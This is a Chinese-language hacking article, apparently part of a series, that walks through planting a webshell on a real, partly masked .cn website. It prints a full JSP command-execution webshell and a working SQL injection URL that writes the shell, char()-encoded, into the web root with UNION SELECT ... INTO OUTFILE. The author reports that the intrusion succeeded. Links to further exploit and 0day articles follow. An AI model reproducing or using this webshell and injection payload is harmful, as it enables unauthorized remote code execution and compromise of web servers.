[组图]Jsp+Mysql网站注入并拿root权限的入侵全过程6.注入导出webshell
假设我们没有得到他的telnet的弱口令,那如何来得到此站的webshell?angel在文<
我们这里要用到的jsp webshell是
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>我们把上述代码中的回车去掉,并转换为ascii码如图11所示.
再在ie中提交如下地址
http://www.***.***.cn/content.jsp?tablename=zhxw&id=1530%20and%201=2%20union%20select%201,1,char(60,37,64,32,112,97,103,101,32,105,109,112,111,114,116,61,34,106,97,118,97,46,105,111,46,42,34,32,37,62,60,37,116,114,121,32,123,83,116,114,105,110,103,32,99,109,100,32,61,32,114,101,113,117,101,115,116,46,103,101,116,80,97,114,97,109,101,116,101,114,40,34,99,109,100,34,41,59,80,114,111,99,101,115,115,32,99,104,105,108,100,32,61,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,99,109,100,41,59,73,110,112,117,116,83,116,114,101,97,109,32,105,110,32,61,32,99,104,105,108,100,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,105,110,116,32,99,59,119,104,105,108,101,32,40,40,99,32,61,105,110,46,114,101,97,100,40,41,41,32,33,61,32,45,49,41,32,123,111,117,116,46,112,114,105,110,116,40,40,99,104,97,114,41,99,41,59,125,105,110,46,99,108,111,115,101,40,41,59,116,114,121,32,123,99,104,105,108,100,46,119,97,105,116,70,111,114,40,41,59,125,32,99,97,116,99,104,40,73,110,116,101,114,114,117,112,116,101,100,69,120,99,101,112,116,105,111,110,32,101,41,32,123,101,46,112,114,105,110,116,83,116,97,99,107,84,114,97,99,101,40,41,59,125,125,32,99,97,116,99,104,32,40,73,79,69,120,99,101,112,116,105,111,110,32,101,41,32,123,83,121,115,116,101,109,46,101,114,114,46,112,114,105,110,116,108,110,40,101,41,59,125,37,62),1,1,1%20from%20admin%20into%20outfile%20'/www/ping/pingping.jsp'/*
返回如图12所示结果
呵呵,提示有错误,其实已经成功了!我们直接在ie中连接此web目录中后门的地址得到如图13所示
确实成功了!
我们的渗透也就此结束了.由于本人水平有限,文中难免有不当之处,请多多指教。我的qq是874842,我的email:wilse4694@sina.com.
参考文献1.http://www.4ngel.net/article/36.htm
2. http://www.4ngel.net/article/30.htm
3.http://www.securiteam.com/exploits/6G00P1PC0U.html
4.http://www.securiteam.com/securitynews/5MP031P1FG.html
| [0day]PHPWind 5.x Exploits GUI | 04-07 | |
| dxbbs漏洞(通杀7.3以前所有版本) | 04-06 | |
| 记对一足球推荐站点的渗透 | 04-06 | |
| 注射DB_ONER权限并且主机与数据库 | 04-06 | |
| bbsxp sql最新版再爆0day? | 04-02 | |
| BBS的通杀跨站方法 | 04-02 | |
| CCTV的XSS跨站 | 03-28 | |
| 全面解析百度XSS跨站漏洞 | 03-26 | |
| Wordpress 2.1.2 以及之前版本物 | 03-26 | |
| 动易最新入侵方法 | 03-15 | |
| PJBlog漏洞利用 | 03-14 | |
| DVBBS <= 7.1.0 sp1 博客 远程注 | 03-14 | |
您现在的位置: